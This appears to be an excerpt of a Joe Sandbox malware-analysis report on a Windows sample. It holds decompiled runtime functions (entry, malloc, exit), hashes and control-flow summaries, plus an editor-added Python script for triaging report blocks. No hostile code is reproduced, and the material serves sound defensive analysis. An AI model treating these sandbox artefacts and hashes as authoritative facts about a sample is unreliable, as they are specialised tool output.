                                                                          • Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: AddressBindLibraryLoadProcRuntime
                                                                          • String ID: CLRCreateInstance$_ENTRYPOINT$_RESOLVER$mscoree.dll$v4.0.30319
                                                                          • API String ID: 1913072896-462958808
                                                                          • Opcode ID: f3b6472012121814c1d1e1eb4ba8619a55f6d8af2726c66d05a3f34480e627bb
                                                                          • Instruction ID: 49c260c5a2cbdef08240e31cd928824d80f17254cdbb0a433857b6d5b5182971
                                                                          • Opcode Fuzzy Hash: f3b6472012121814c1d1e1eb4ba8619a55f6d8af2726c66d05a3f34480e627bb
                                                                          • Instruction Fuzzy Hash: D3214878254309AFD604DB60CE49F3A7BA5AB84B04F05C91CBA4997294DAB0E918CA72
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: m
                                                                          • API String ID: 0-3775001192
                                                                          • Opcode ID: b6f12c9bbba153c5544c870d7077fe7f8d816adc5e4b05a67b73591db8c0b64c
                                                                          • Instruction ID: bd2f3ffcd72c18f7c059059a2ac07484141d55f47cb375e5af8035356d72cd1b
                                                                          • Opcode Fuzzy Hash: b6f12c9bbba153c5544c870d7077fe7f8d816adc5e4b05a67b73591db8c0b64c
                                                                          • Instruction Fuzzy Hash: F022BF70A006158FCB14DF69C484AAEFBF2FF88314B608A69E515EB791DB34ED45CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a7c54d3a73679fb1897da648c733650eee143a2f9898888ca46afa0ab5170dd8
                                                                          • Instruction ID: 5fd07ab66c4236d85bd9622407c8cb8b008e416f490a245e57538ecdf1b0c7de
                                                                          • Opcode Fuzzy Hash: a7c54d3a73679fb1897da648c733650eee143a2f9898888ca46afa0ab5170dd8
                                                                          • Instruction Fuzzy Hash: 3F322775A002149FCB14DF69C884EAABBF2FF88310F55855AE915AF365D730EC81CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 90%
                                                                          			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                          				intOrPtr _t17;
                                                                          				void* _t18;
                                                                          				void* _t19;
                                                                          				intOrPtr _t23;
                                                                          				void* _t24;
                                                                          				void* _t25;
                                                                          				void* _t26;
                                                                          				void* _t27;
                                                                          				intOrPtr _t28;
                                                                          				signed int _t39;
                                                                          				void* _t49;
                                                                          				signed int _t52;
                                                                          				void* _t54;
                                                                          				void* _t56;
                                                                          
                                                                          				_t50 = __edi;
                                                                          				_t49 = __edx;
                                                                          				E00DF24D8();
                                                                          				_push(0x14);
                                                                          				_push(0xdfd6e0);
                                                                          				E00DF2A00(__ebx, __edi, __esi);
                                                                          				_t52 = E00DF26BB() & 0x0000ffff;
                                                                          				E00DF248B(2);
                                                                          				_t56 =  *0xdf0000 - 0x5a4d; // 0x5a4d
                                                                          				if(_t56 == 0) {
                                                                          					_t17 =  *0xdf003c; // 0xe8
                                                                          					__eflags =  *((intOrPtr*)(_t17 + 0xdf0000)) - 0x4550;
                                                                          					if( *((intOrPtr*)(_t17 + 0xdf0000)) != 0x4550) {
                                                                          						goto L2;
                                                                          					} else {
                                                                          						__eflags =  *((intOrPtr*)(_t17 + 0xdf0018)) - 0x10b;
                                                                          						if( *((intOrPtr*)(_t17 + 0xdf0018)) != 0x10b) {
                                                                          							goto L2;
                                                                          						} else {
                                                                          							_t39 = 0;
                                                                          							__eflags =  *((intOrPtr*)(_t17 + 0xdf0074)) - 0xe;
                                                                          							if( *((intOrPtr*)(_t17 + 0xdf0074)) > 0xe) {
                                                                          								__eflags =  *(_t17 + 0xdf00e8);
                                                                          								_t6 =  *(_t17 + 0xdf00e8) != 0;
                                                                          								__eflags = _t6;
                                                                          								_t39 = 0 | _t6;
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					L2:
                                                                          					_t39 = 0;
                                                                          				}
                                                                          				 *(_t54 - 0x1c) = _t39;
                                                                          				_t18 = E00DF1EBA();
                                                                          				_t57 = _t18;
                                                                          				if(_t18 == 0) {
                                                                          					E00DF13A5(0x1c);
                                                                          				}
                                                                          				_t19 = E00DF191D(_t39, _t50, _t57);
                                                                          				_t58 = _t19;
                                                                          				if(_t19 == 0) {
                                                                          					_t19 = E00DF13A5(0x10);
                                                                          				}
                                                                          				E00DF2572(_t19);
                                                                          				 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
                                                                          				if(E00DF1ECF(_t39, _t50, _t52, _t58) < 0) {
                                                                          					E00DF13A5(0x1b);
                                                                          				}
                                                                          				 *0xe01c90 = GetCommandLineA(); // executed
                                                                          				_t23 = E00DF25B2(); // executed
                                                                          				 *0xdffe00 = _t23;
                                                                          				_t24 = E00DF217D();
                                                                          				_t60 = _t24;
                                                                          				if(_t24 < 0) {
                                                                          					E00DF19F8(_t39, _t49, _t50, _t52, _t60, 8);
                                                                          				}
                                                                          				_t25 = E00DF23AA(_t39, _t49, _t50, _t52);
                                                                          				_t61 = _t25;
                                                                          				if(_t25 < 0) {
                                                                          					E00DF19F8(_t39, _t49, _t50, _t52, _t61, 9);
                                                                          				}
                                                                          				_t26 = E00DF1A32(_t50, _t52, 1);
                                                                          				_t62 = _t26;
                                                                          				if(_t26 != 0) {
                                                                          					E00DF19F8(_t39, _t49, _t50, _t52, _t62, _t26);
                                                                          				}
                                                                          				_t27 = E00DF2992();
                                                                          				_push(_t52);
                                                                          				_push(_t27);
                                                                          				_push(0);
                                                                          				_t28 = E00DF1140(0xdf0000); // executed
                                                                          				_t53 = _t28;
                                                                          				 *((intOrPtr*)(_t54 - 0x24)) = _t28;
                                                                          				if(_t39 == 0) {
                                                                          					E00DF1C8E(_t53); // executed
                                                                          				}
                                                                          				E00DF1A23();
                                                                          				 *(_t54 - 4) = 0xfffffffe;
                                                                          				return E00DF2A45(_t53);
                                                                          			}

                                                                          APIs
                                                                          • ___security_init_cookie.LIBCMT ref: 00DF124B
                                                                            • Part of subcall function 00DF26BB: GetStartupInfoW.KERNEL32(?), ref: 00DF26C5
                                                                          • _fast_error_exit.LIBCMT ref: 00DF12C4
                                                                          • _fast_error_exit.LIBCMT ref: 00DF12D5
                                                                          • __RTC_Initialize.LIBCMT ref: 00DF12DB
                                                                          • _fast_error_exit.LIBCMT ref: 00DF12EF
                                                                          • GetCommandLineA.KERNEL32(00DFD6E0,00000014), ref: 00DF12F5
                                                                          • ___crtGetEnvironmentStringsA.LIBCMT ref: 00DF1300
                                                                          • __setargv.LIBCMT ref: 00DF130A
                                                                          • __setenvp.LIBCMT ref: 00DF131B
                                                                          • __cinit.LIBCMT ref: 00DF132E
                                                                          • __wincmdln.LIBCMT ref: 00DF133F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
                                                                          • Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp
                                                                          • Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp
                                                                          • Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: _fast_error_exit$CommandEnvironmentInfoInitializeLineStartupStrings___crt___security_init_cookie__cinit__setargv__setenvp__wincmdln
                                                                          • String ID: .$
                                                                          • API String ID: 2757020214-2223841709
                                                                          • Opcode ID: a7d9564194a40788b562f9f997c708efb676a7d1020318bb432e85e442ff2449
                                                                          • Instruction ID: 9f0e9058337f02f3d33e8cb26775e1f669d82cd08db384b17378e0858810bdf7
                                                                          • Opcode Fuzzy Hash: a7d9564194a40788b562f9f997c708efb676a7d1020318bb432e85e442ff2449
                                                                          • Instruction Fuzzy Hash: 0421D328A4031CD9EB20B7F09847B3D22A4DF20754F17C569FB14DA1D3EEB4C4809A75
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

Control-flow Graph

4 basic blocks, df19b0-df19e1: 91 (df19b0-df19c7, GetModuleHandleExW) -> 92 (df19c9-df19d9, GetProcAddress) or 93 (df19e0-df19e1, return); 92 -> 94 (df19db-df19de, CorExitProcess) or 93; 94 -> 93.
C-Code - Quality: 16%
			E00DF19B0(void* __ecx, intOrPtr _a4) {
				// MSVC CRT __crtCorExitProcess (identified from the mscoree.dll /
				// CorExitProcess pair in the API list below): standard runtime
				// shutdown code, not sample-specific. If the CLR is loaded, the
				// exit code is handed to CorExitProcess so managed shutdown runs
				// before ExitProcess.
				struct HINSTANCE__* _v8;
				_Unknown_base(*)()* _t4;
				void* _t5;

				// GetModuleHandleExW(0, L"mscoree.dll", &_v8) succeeds only when
				// mscoree.dll is already mapped, i.e. the process hosts the CLR.
				_t4 = __imp__GetModuleHandleExW(0, L"mscoree.dll",  &_v8);
				if(_t4 != 0) {
					_t4 = GetProcAddress(_v8, "CorExitProcess");
					if(_t4 != 0) {
						// Marked executed in this trace, so mscoree.dll was loaded
						// in the process by the time it exited.
						_t5 =  *_t4(_a4); // executed
						return _t5;
					}
				}
				return _t4;
			}

Instruction addresses for the statements in the listing above (0x00000000 marks a line with no mapped instruction): 0x00df19b4, 0x00df19bf, 0x00df19c7, 0x00df19d1, 0x00df19d9, 0x00df19de, 0x00000000, 0x00df19de, 0x00df19d9, 0x00df19e1


                                                                          APIs
                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000001,?,?,00DF19ED,00000000,?,00DF4933,000000FF,0000001E,00000000,00000000,00000000,?,00DF2E9E), ref: 00DF19BF
                                                                          • GetProcAddress.KERNEL32(00000001,CorExitProcess), ref: 00DF19D1
                                                                          • CorExitProcess.MSCOREE(00000000,?,?,00DF19ED,00000000,?,00DF4933,000000FF,0000001E,00000000,00000000,00000000,?,00DF2E9E,00000000,00000000), ref: 00DF19DE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
• Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp
• Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp
• Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp
• Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp
• Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp
• Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: AddressExitHandleModuleProcProcess
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 75539706-1276376045
                                                                          • Opcode ID: e93691948fe2a410687eefb6178928678c2ce9436185d16d5ea66af637dfca78
                                                                          • Instruction ID: b828905feaefdf0d94751319351059e6e09cf9af86eb25c3100a94aa22606010
                                                                          • Opcode Fuzzy Hash: e93691948fe2a410687eefb6178928678c2ce9436185d16d5ea66af637dfca78
                                                                          • Instruction Fuzzy Hash: 69D0123474430CBBDB015B91CD17FB97B6CAB00784F098010BA15E0090DBA1DF44EAB4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

Control-flow Graph

16 basic blocks, df4906-df4997: 95 (df4906-df4910) -> 96 (df4912-df4913) or 97 (df4981-df4993: call df3eba, call df3bbe) -> 112 (df4995-df4997). 96 -> 99 (df4914-df491b) -> 101 (df491d-df4939: call df1ca2, call df1cff, call df19e2) or 102 (df493a-df493c); 101 -> 102 -> 103 (df493e-df4940) or 104 (df4942-df4944) -> 107 (df4945-df4953: RtlAllocateHeap) -> 110 (df497b-df497f) or 111 (df4955-df495e); 111 -> 114 (df496d-df4972: call df3bbe) or 115 (df4960-df4969: call df3eba); 115 -> 99 (retry) or 123 (df496b); 114 and 123 -> 124 (df4974-df4979: call df3bbe) -> 110 -> 112.
C-Code - Quality: 93%
			E00DF4906(intOrPtr __ebx, void* __edx, void* __edi, long _a4) {
				// MSVC CRT malloc (identified from the __FF_MSGBANNER / __NMSG_WRITE /
				// ExitProcess / RtlAllocateHeap pattern in the API list below):
				// standard runtime code, not sample-specific. _a4 is the requested
				// size. The literals are CRT constants: 0xffffffe0 = _HEAP_MAXREQ,
				// 0xc = ENOMEM, 0x1e = _RT_CRT_NOTINIT (runtime error R6030),
				// 0xff = the exit code used when the CRT heap is missing.
				// E00DF3EBA behaves as _callnewh, E00DF3BBE as _errno() (it calls
				// __getptd_noexit), *0xe00790 as _crtheap and *0xe00b68 as _newmode.
				void* __esi;
				void* __ebp;
				void* _t2;
				void* _t6;
				void* _t7;
				void* _t11;
				intOrPtr _t14;
				long _t18;
				void* _t22;
				void* _t23;
				long _t25;
				void* _t27;
				void* _t31;

				_t23 = __edi;
				_t22 = __edx;
				_t14 = __ebx;
				_t25 = _a4;
				if(_t25 > 0xffffffe0) {
					// Oversized request: run the new handler, set errno = ENOMEM, fail.
					E00DF3EBA(_t2, _t25);
					 *((intOrPtr*)(E00DF3BBE(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				_push(__ebx);
				_push(__edi);
				while(1) {
					_t6 =  *0xe00790; // 0x17c0000, the CRT heap handle
					_t27 = _t6;
					if(_t6 == 0) {
						// CRT heap not initialised: print the "CRT not initialized"
						// banner and terminate with exit code 255.
						E00DF1CA2(_t14, _t22, _t23, _t25, _t27);
						E00DF1CFF(_t14, _t22, _t23, _t25, 0x1e);
						E00DF19E2(0xff);
						_t6 =  *0xe00790; // 0x17c0000
					}
					if(_t25 == 0) {
						_t18 = 1; // malloc(0) allocates one byte
						__eflags = 1;
					} else {
						_t18 = _t25;
					}
					_t7 = RtlAllocateHeap(_t6, 0, _t18); // executed
					_t23 = _t7;
					if(_t23 != 0) {
						break;
					}
					_t14 = 0xc;
					if( *0xe00b68 == _t7) {
						// _newmode == 0: no new-handler retry, report ENOMEM (the
						// duplicated store is a decompiler artefact of the shared exit path).
						 *((intOrPtr*)(E00DF3BBE(__eflags))) = _t14;
						L12:
						 *((intOrPtr*)(E00DF3BBE(_t31))) = _t14;
						break;
					}
					// _callnewh(size) != 0 means a new handler ran: retry the allocation.
					_t11 = E00DF3EBA(_t7, _t25);
					_t31 = _t11;
					if(_t11 != 0) {
						continue;
					}
					goto L12;
				}
				return _t23;
			}

Instruction addresses for the statements in the listing above (0x00000000 marks a line with no mapped instruction): 0x00df4906, 0x00df4906, 0x00df4906, 0x00df490a, 0x00df4910, 0x00df4982, 0x00df498d, 0x00df4993, 0x00000000, 0x00df4993, 0x00df4912, 0x00df4913, 0x00df4914, 0x00df4914, 0x00df4919, 0x00df491b, 0x00df491d, 0x00df4924, 0x00df492e, 0x00df4933, 0x00df4939, 0x00df493c, 0x00df4944, 0x00df4944, 0x00df493e, 0x00df493e, 0x00df493e, 0x00df4949, 0x00df494f, 0x00df4953, 0x00000000, 0x00000000, 0x00df4957, 0x00df495e, 0x00df4972, 0x00df4974, 0x00df4979, 0x00000000, 0x00df4979, 0x00df4961, 0x00df4967, 0x00df4969, 0x00000000, 0x00000000, 0x00000000, 0x00df496b, 0x00000000


                                                                          APIs
                                                                          • __FF_MSGBANNER.LIBCMT ref: 00DF491D
                                                                            • Part of subcall function 00DF1CA2: __NMSG_WRITE.LIBCMT ref: 00DF1CC9
                                                                            • Part of subcall function 00DF1CA2: __NMSG_WRITE.LIBCMT ref: 00DF1CD3
                                                                          • __NMSG_WRITE.LIBCMT ref: 00DF4924
                                                                            • Part of subcall function 00DF1CFF: GetModuleFileNameW.KERNEL32(00000000,00E0019A,00000104,00000000,00000000,00000000), ref: 00DF1D91
                                                                            • Part of subcall function 00DF1CFF: ___crtMessageBoxW.LIBCMT ref: 00DF1E3F
                                                                            • Part of subcall function 00DF19E2: ExitProcess.KERNEL32 ref: 00DF19F1
                                                                            • Part of subcall function 00DF3BBE: __getptd_noexit.LIBCMT ref: 00DF3BBE
                                                                          • RtlAllocateHeap.NTDLL(017C0000,00000000,00000001,00000000,00000000,00000000,?,00DF2E9E,00000000,00000000,00000000,00000000,?,00DF2D56,00000018,00DFD7D0), ref: 00DF4949
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
• Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp
• Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp
• Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp
• Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp
• Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp
• Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateExitFileHeapMessageModuleNameProcess___crt__getptd_noexit
                                                                          • String ID:
                                                                          • API String ID: 3823847927-0
                                                                          • Opcode ID: 6a1eaaac66dc3962ad66a9cb330b5b83937cc82ba84bc74791caf5e3f7b0a4ac
                                                                          • Instruction ID: f2f2cc439df1ac293a8bf3f7b3e70977ac5bce922d07838113ec86f530cea9ca
                                                                          • Opcode Fuzzy Hash: 6a1eaaac66dc3962ad66a9cb330b5b83937cc82ba84bc74791caf5e3f7b0a4ac
                                                                          • Instruction Fuzzy Hash: 0401F5363402199EE6112B26EC52B3B7348EF41764F1BC12EFB499B291DEB49D408AB0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%
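Every function in this part of the report is laid out the same way: a Control-flow Graph header, an optional decompiled listing, an APIs list in which "Part of subcall function" entries are calls reached only through a callee, a Memory Dump Source line that states whether the bytes are backed by the PE on disk, and Similarity hashes. Triaging a report this long is mostly a matter of filtering out CRT boilerplate such as the two functions above so that attention goes to code the PE image does not account for. The Python below is an editor-added example, not Joe Sandbox code: it parses those blocks from a constructed, shortened copy of this page's own lines and classifies each function. It assumes each block opens with a line reading exactly "Control-flow Graph"; the two KNOWN_CRT identifications (__crtCorExitProcess and malloc) are the editor's reading of the listings, not something the report states.

```python
"""Parse and triage the per-function blocks of a Joe Sandbox disassembly report.
Editor-added example; SAMPLE_REPORT is a constructed, shortened copy of three blocks from this page."""
import re
from dataclasses import dataclass, field
from typing import Optional

SAMPLE_REPORT = """
Control-flow Graph
control_flow_graph 91 df19b0-df19c7 GetModuleHandleExW 92 df19c9-df19d9 GetProcAddress 91->92
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000001,?,?,00DF19ED), ref: 00DF19BF
• GetProcAddress.KERNEL32(00000001,CorExitProcess), ref: 00DF19D1
• CorExitProcess.MSCOREE(00000000,?,?,00DF19ED,00000000), ref: 00DF19DE
Memory Dump Source
• Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
Similarity
• String ID: CorExitProcess$mscoree.dll
• API String ID: 75539706-1276376045
Control-flow Graph
control_flow_graph 95 df4906-df4910 96 df4912-df4913 95->96
APIs
• __FF_MSGBANNER.LIBCMT ref: 00DF491D
  • Part of subcall function 00DF19E2: ExitProcess.KERNEL32 ref: 00DF19F1
• RtlAllocateHeap.NTDLL(017C0000,00000000,00000001,00000000), ref: 00DF4949
Memory Dump Source
• Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
Similarity
• String ID:
• API String ID: 3823847927-0
Control-flow Graph
control_flow_graph 127 5ca5348-5ca5369 128 5ca537a-5ca537e 127->128
Memory Dump Source
• Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
"""

CFG_RE = re.compile(r"^control_flow_graph \d+ ([0-9a-f]+)-")
SOURCE_RE = re.compile(r"Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")
SIM_RE = re.compile(r"^• (API ID|String ID|API String ID|Instruction Fuzzy Hash):\s*(.*)$")
API_RE = re.compile(r"• (?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"  # transitive-call marker
                    r"(?P<name>[\w$@?]+)\.(?P<module>[A-Z0-9_]+)"
                    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)")

@dataclass
class ApiCall:
    name: str
    module: str
    ref: int                    # address of the call site
    subcall_of: Optional[int]   # callee that really issues the call, when transitive

@dataclass
class FunctionBlock:
    start: Optional[int] = None
    image_base: Optional[int] = None
    pe_backed: Optional[bool] = None
    apis: list = field(default_factory=list)
    similarity: dict = field(default_factory=dict)
    def direct_calls(self):
        return [a for a in self.apis if a.subcall_of is None]
    def win32_calls(self):  # non-CRT symbols, transitive ones included: the real OS footprint
        return [a.name for a in self.apis if a.module != "LIBCMT"]

def parse_report(text):
    blocks, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Control-flow Graph":  # every function block opens with this header
            blocks.append(FunctionBlock()); section = None
        elif not line or not blocks:
            continue
        elif line in ("APIs", "Memory Dump Source", "Similarity"):
            section = line
        elif m := CFG_RE.match(line):
            blocks[-1].start = int(m.group(1), 16)
        elif section == "APIs" and (m := API_RE.search(line)):
            blocks[-1].apis.append(ApiCall(m["name"], m["module"], int(m["ref"], 16),
                                           int(m["sub"], 16) if m["sub"] else None))
        elif section == "Memory Dump Source" and (m := SOURCE_RE.search(line)):
            blocks[-1].image_base, blocks[-1].pe_backed = int(m.group(1), 16), m.group(2) == "true"
        elif section == "Similarity" and (m := SIM_RE.match(line)):
            blocks[-1].similarity[m.group(1)] = m.group(2).strip()
    return blocks

# Keyed on the report's own "API String ID" (hash of API set + referenced strings). These two
# identifications are the editor's reading of the listings on this page, not report output.
KNOWN_CRT = {"75539706-1276376045": "__crtCorExitProcess (MSVC CRT)",
             "3823847927-0": "malloc (MSVC CRT, new-handler retry loop)"}

def triage(block):
    """Return (category, note); unbacked memory first, then known CRT, then CRT-internal."""
    if block.pe_backed is False:  # not mapped from the PE on disk: unpacked, injected or JIT code
        return "unbacked-memory", f"region {block.image_base:08X}, not backed by the PE"
    if ident := KNOWN_CRT.get(block.similarity.get("API String ID", "")):
        return "crt-known", ident
    direct = block.direct_calls()
    if direct and all(a.module == "LIBCMT" for a in direct):
        return "crt-internal", "direct calls only into the CRT: " + ", ".join(a.name for a in direct)
    return "review", "Win32 calls: " + ", ".join(block.win32_calls())
```

To use it on a full report, paste the disassembly section into SAMPLE_REPORT or read it from a file and print triage(b) for each parsed block. The unbacked-memory category (on this page the 05CA0000 and 03420000 regions) is the one to read first; crt-known and crt-internal functions can be skipped. Keeping direct_calls() separate from win32_calls() stops transitive entries from being misread as a function's own behaviour: E00DF4906 reaches ExitProcess only through E00DF19E2, which a plain grep over the APIs list would miss.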

Control-flow Graph

16 basic blocks plus two resolved call sites, 5ca5348-5ca546a: 127 (5ca5348-5ca5369) -> 128 (5ca537a-5ca537e) or 129 (5ca536b-5ca5377); 128 -> 130 (5ca538d-5ca53a9) or 131 (5ca5380-5ca538a) -> 130; 130 -> 135 (5ca53af) or 136 (5ca5446-5ca5459). 135 calls 5ca55f0 or 5ca5990 at 5ca53b2 and continues at 140 (5ca53b8-5ca53ba) -> 141 (5ca53c9-5ca53e1) or 142 (5ca53bc-5ca53c7); 142 -> 141 or 144 (5ca53e3-5ca5420) -> 150 (5ca543c-5ca5440) or 151 (5ca5422-5ca543a); 150 -> 135 (loop) or 136. 136 -> 137 (5ca545b-5ca545f) -> 138 (5ca546a) or 139 (5ca5461) -> 138; 141 and 151 -> 137.
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: \l$\l
                                                                          • API String ID: 0-449874781
                                                                          • Opcode ID: 2c054323bcbda41f064b068861053fb142446a5045a74efb532fe44b123b4e19
                                                                          • Instruction ID: 386406eb8da1d09b1a41c3bfb682683476b1b138e3be8784d202298afa925727
                                                                          • Opcode Fuzzy Hash: 2c054323bcbda41f064b068861053fb142446a5045a74efb532fe44b123b4e19
                                                                          • Instruction Fuzzy Hash: E9317C32A0420ACBDF24DF65E4987EEBFB2EF88319F14C829D416A7280DB705945DB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

Control-flow Graph

26 basic blocks plus six resolved call sites, 342c1e8-342c775: 279 (342c1e8-342c232: call 3429fb0, call 342bca0) -> 286 (342c234-342c24a) or 287 (342c279); 286 -> 290 (342c253-342c277) or 291 (342c24c) -> 290 -> 287. The call at 342c27e resolves to 342c720, 342c711, 342c1e8 (recursion) or 342c1cf, then 288 (342c284-342c296) -> 294 (342c2cb-342c310) or 295 (342c298-342c2ad); 295 calls 342cea0 or 342ce91 at 342c2b0, then 298 (342c2b2-342c2bb: call 342f1a0) -> 300 (342c2c1-342c2c8). 294 -> 303 (342c6f0-342c73c) or 304 (342c316-342c325). From 304 a chain of two-way tests at 304, 308 (342c32b-342c33a), 312 (342c340-342c34f), 323 (342c355-342c364), 331 (342c36a-342c379) and 340 (342c37f-342c38e) each sends one arm to a large block (307 342c433-342c471, 313 342c476-342c53e, 322 342c543-342c5dd, 330 342c5e2-342c637, 341 342c63c-342c6eb, 351 342c394-342c42e) that ends at 336 (342c6ed-342c6ef); the other arm of 340 goes to 303 -> 319 (342c748-342c775) or 320 (342c73e) -> 319.
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: c"
                                                                          • API String ID: 0-2139221276
                                                                          • Opcode ID: 48ce6cd3c228288ee9c59b171ff4b93c461f905bf528183f9221b31f0ea905e9
                                                                          • Instruction ID: c55b6729b60a778b88af127990d20525b937c8c80b5bc4bef57858f69c36d07d
                                                                          • Opcode Fuzzy Hash: 48ce6cd3c228288ee9c59b171ff4b93c461f905bf528183f9221b31f0ea905e9
                                                                          • Instruction Fuzzy Hash: 72C18C78B04DB90BC718E6B8D46173F61AF9BC8548F23406D960FDB794DF24AD0293A6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

Control-flow Graph

2 basic blocks, df1c8e-df1ca1: 410 (df1c8e-df1c98, call df1b5f) -> 412 (df1c9d-df1ca1, return).
C-Code - Quality: 25%
			E00DF1C8E(intOrPtr _a4) {
				// MSVC CRT exit(): _doexit(code, quick = 0, retcaller = 0), per the
				// _doexit.LIBCMT reference at 00DF1C98 below. _doexit takes __lock
				// and walks the EncodePointer/DecodePointer-protected onexit table
				// (the calls listed under E00DF1B5F), then terminates the process.
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t8;

				_push(0);    // retcaller = 0
				_push(0);    // quick = 0
				_push(_a4);  // exit code
				_t2 = E00DF1B5F(_t3, _t4, _t5, _t8); // executed: _doexit
				return _t2;
			}

Instruction addresses for the statements in the listing above: 0x00df1c91, 0x00df1c93, 0x00df1c95, 0x00df1c98, 0x00df1ca1


                                                                          APIs
                                                                          • _doexit.LIBCMT ref: 00DF1C98
                                                                            • Part of subcall function 00DF1B5F: __lock.LIBCMT ref: 00DF1B6D
                                                                            • Part of subcall function 00DF1B5F: DecodePointer.KERNEL32(00DFD750,0000001C,00DF1AD2,00000000,00000001,00000000,?,00DF1A13,000000FF,?,00DF2CB0,00000011,00000000,?,00DF18B3,0000000D), ref: 00DF1BAC
                                                                            • Part of subcall function 00DF1B5F: DecodePointer.KERNEL32(?,00DF1A13,000000FF,?,00DF2CB0,00000011,00000000,?,00DF18B3,0000000D), ref: 00DF1BBD
